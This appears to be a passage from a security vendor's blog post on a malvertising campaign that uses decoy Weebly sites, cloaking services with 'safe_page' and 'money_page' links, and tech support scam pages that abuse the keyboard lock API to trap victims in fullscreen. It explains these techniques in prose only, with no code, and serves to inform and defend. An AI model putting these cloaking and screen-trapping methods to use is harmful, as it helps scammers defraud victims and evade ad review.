We also tried to look for games such as Solitaire:

And of course, we couldn’t do without checking on the weather:

Decoy sites

While the links for the sponsored sites may look legitimate, they aren’t. The problem is that unless you are the intended victim, you will only see the clean content. It matters because crawlers and other ad quality check tools may validate the advertiser and allow the ad to be reached by a large audience.

Each site is very simple and contains content that was stolen from somewhere else and put together hastily.

The threat actor has been creating hundreds of those websites via the Weebly platform which they are abusing. Some days, we saw an average of 10 new Weebly hostnames used by the scammers.

Cloaking

As mentioned earlier, it is important for the scammers to stay under the radar and make it as though these webpages are legitimate. They can do this easily by using a technique known as cloaking.

Cloaking is simply showing different content based on a target audience and being able to hide the payload from some non desirable visitors (i.e. web crawlers, security researchers).

The scammers did this in various ways, some quite simple (user-agent and IP check) but they also paid for a professional cloaking service.

The cloaker API will return a response that contains two different links:

• The “safe_page” which is the URL for the decoy Weebly site

• The “money_page” which is the URL to make money from

In this case the money page is a URL belonging to Digital Ocean and hosting a tech support scam page.

Tech support scam

Most scammers will use a template for the tech support scam page which is customized for the operating system and browser the victim is running. This scheme is adapted for both Windows and Mac, supporting the Chrome, Opera, Safari and Firefox browsers.

In this case they are also abusing a browser feature that remaps keystrokes when a page is in fullscreen by targeting the navigator.keyboard.lock API. What this means in practical terms is that the user will not be able to exit from the fullscreen page unless they press and hold the Escape key for several seconds. Many people will panic and call the phone number on the screen, only to fall in the hands of scammers and lose hundreds, sometimes even thousands of dollars.

Protection from malvertising attacks

Malvertising can come in different forms and ad formats, and the same can be said about the payloads that are distributed.

As we saw earlier this year, clicking on the top ad for a software download doesn’t always get you what you wanted, in fact it can infect your computer with malware. Threat actors are very good at impersonating legitimate brands and setting convincing websites.

We have reported and continue to report this malvertising campaign to Google and Block Inc. (Weebly).

We always recommend using a layered approach to security and for malvertising you will need web protection combined with anti-malware protection. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against such threats.

TRY NOW